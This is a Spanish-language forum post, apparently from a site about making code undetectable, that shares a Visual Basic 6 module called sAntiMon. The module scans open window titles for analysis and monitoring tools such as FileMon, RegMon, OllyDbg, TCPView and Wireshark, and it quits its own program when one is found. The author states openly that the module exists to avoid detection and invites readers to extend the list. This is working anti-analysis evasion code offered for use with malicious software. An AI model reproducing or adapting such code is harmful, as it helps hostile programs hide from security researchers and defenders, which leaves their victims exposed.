Os he preparado este módulo para evitar ser detectados por las siguientes aplicaciones:
FileMon
RegMon
ProcessMon
DiskMon
PortMon
ollydbg (Funciona con varias versiones, puede que no con todas)
TCPView
Wireshark
Creo que aún se puede mejorar un poco el módulo para que consuma menos recursos. También puedes añadir todas las aplicaciones de este tipo que quieras.
Código: Seleccionar todo
'---------------------------
'- Módulo sAntiMon -
'- Autor: Slek -
'- Versión: 1 -
'- Fecha: 17/03/10 -
'- Indetectables.net -
'---------------------------
Option Explicit
'Apis
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function EnumWindows Lib "user32" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
'Variables
Dim sTitle As String
Dim lHwnd As Long
Public Function FEnum(ByVal ahWnd As Long, ByVal param As Long) As Long
Dim Buf As String
Dim Title As String, Length As Long
Length = GetWindowTextLength(ahWnd)
Buf = Space$(Length)
Length = GetWindowText(ahWnd, Buf, Length)
Title = Left$(Buf, Length)
If InStr(LCase(Title), LCase(sTitle)) <> 0 Then
lHwnd = ahWnd
FEnum = 0
Else
FEnum = 1
End If
End Function
Public Function sAntiMon()
Dim aT(11) As String
Dim i As Long
aT(0) = "File Mon"
aT(1) = "Registry Mon"
aT(2) = "Process Mon"
aT(3) = "Disk Mon"
aT(4) = "Portmon"
aT(5) = "DebugView"
aT(6) = "MyDEBUG"
aT(7) = "ollydbg"
aT(8) = "Shadow"
aT(9) = "[CPU"
aT(10) = "TCPView"
aT(11) = "Wireshark"
For i = 0 To UBound(aT)
lHwnd = 0
sTitle = aT(i)
EnumWindows AddressOf FEnum, 0
If lHwnd <> 0 Then End
Next i
End FunctionSaludos!
